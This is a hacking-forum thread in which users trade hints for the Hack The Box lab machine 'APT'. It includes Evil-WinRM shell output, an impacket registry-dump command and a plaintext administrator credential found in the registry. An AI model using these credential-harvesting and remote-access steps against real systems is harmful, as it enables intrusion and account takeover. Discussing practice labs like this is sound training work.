Posts
31
Threads
0
Joined
Jun 2019
1 Year of service
December 01, 2020 at 08:33 PM
This post was last modified: December 01, 2020 at 08:37 PM by bodiesplus.
I needed more coffee and -p- :D
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"
Error: Exiting with code 1
so
.... -i apt.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
:)
:)
Posts
102
Threads
4
Joined
Nov 2020
December 01, 2020 at 11:00 PM
(December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee and -p- :D
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"
Error: Exiting with code 1
so
.... -i apt.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
:)
:)
How did you find the username? Check my post on the last page
Posts
31
Threads
0
Joined
Jun 2019
1 Year of service
December 01, 2020 at 11:45 PM
This post was last modified: December 01, 2020 at 11:53 PM by bodiesplus.
(December 01, 2020 at 11:00 PM)runos Wrote: (December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee and -p- :D
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"
Error: Exiting with code 1
so
.... -i apt.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
:)
:)
How did you find the username? Check my post on the last page
using rpcclient and the henry.vinson hash.
I am stuck with the root part. It seems the AV kills winPEAS or somehow it does not run.
Any hints ?
:)
Posts
102
Threads
4
Joined
Nov 2020
December 02, 2020 at 12:00 AM
(December 01, 2020 at 11:45 PM)bodiesplus Wrote: (December 01, 2020 at 11:00 PM)runos Wrote: (December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee and -p- :D
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"
Error: Exiting with code 1
so
.... -i apt.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
:)
:)
How did you find the username? Check my post on the last page
using rpcclient and the henry.vinson hash.
I am stuck with the root part. It seems the AV kills winPEAS or somehow it does not run.
Any hints ?
:)
Can you explain how exactly you found that you should use henry.vinson user?
Posts
6
Threads
0
Joined
Jun 2019
1 Year of service
December 02, 2020 at 12:39 AM
Assuming apt6.htb is your ipv6 IP of the box
Get a kerberos ticket
Query the registry using impacket
reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find
\Network\
\Software\
\Software\GiganticHostingManagementSystem\
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\
User winrm to log in to APT
Posts
412
Threads
32
Joined
Jan 2020
1 Year of service
December 20, 2020 at 02:21 AM
Has anyone found a walkthrough for this box yet?
Posts
2
Threads
0
Joined
Dec 2020
December 25, 2020 at 11:31 AM
Hi guys, i need help rooting this box. Am stuck on user
Posts
31
Threads
0
Joined
Jun 2019
1 Year of service
December 25, 2020 at 01:23 PM
(December 20, 2020 at 02:21 AM)Buttmuncher Wrote: Has anyone found a walkthrough for this box yet?
C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
... good luck ... :)
Posts
2
Threads
0
Joined
Nov 2020
December 26, 2020 at 04:04 PM
This post was last modified: December 26, 2020 at 04:06 PM by djstoks. Edited 1 time in total.
I found the parameter
AuditPolicySD
REG_BINARY
01000000D08C9DDF0115D1118.....
But i not understud how decrypt it
I can use powershell convertto-securestring, but I need Key. Where to get it?
Or is it a rabbithole?
Posts
51
Threads
5
Joined
Jun 2020
December 27, 2020 at 09:25 AM
This post was last modified: December 27, 2020 at 09:27 AM by ARhOmOuTEd.
(December 20, 2020 at 02:21 AM)Buttmuncher Wrote: Has anyone found a walkthrough for this box yet? no, but what do you want to know?
(December 26, 2020 at 04:04 PM)djstoks Wrote: I found the parameter
AuditPolicySD
REG_BINARY
01000000D08C9DDF0115D1118.....
But i not understud how decrypt it
I can use powershell convertto-securestring, but I need Key. Where to get it?
Or is it a rabbithole? this is a rabit hole, its about NTLMv1, like you can see in the consolehost_history.txt
Posts
412
Threads
32
Joined
Jan 2020
1 Year of service
December 28, 2020 at 03:34 PM
(December 27, 2020 at 09:25 AM)ARhOmOuTEd Wrote: no, but what do you want to know?
well, a walkthrough really. you know, things like the wordlists people used etc.
Posts
102
Threads
4
Joined
Nov 2020
December 29, 2020 at 10:41 AM
This post was last modified: December 29, 2020 at 10:42 AM by runos. Edited 1 time in total.
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box
Get a kerberos ticket
Query the registry using impacket
reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
\Network\
\Software\
\Software\GiganticHostingManagementSystem\
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\
User winrm to log in to APT
Nice, do you know how to priv esc on this machine?
|
